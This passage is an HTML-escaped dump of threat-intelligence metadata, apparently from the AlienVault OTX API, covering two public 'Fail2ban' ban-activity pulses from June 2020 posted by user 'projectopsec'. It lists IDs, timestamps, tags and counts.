;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ee40a1ebf4e962f7df8f3cb',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-12T23:01:07.722000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'282&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-06-12&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'60886aec-1450-459b-b91b-5d5b204183ad',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-06-09T23:05:37.566000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ee015c11c5ed9ba684ef734',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-09T23:02:55.045000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'285&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-06-09&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'e197ce9a-dfcb-4ae4-a641-ae947a9f78cb',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n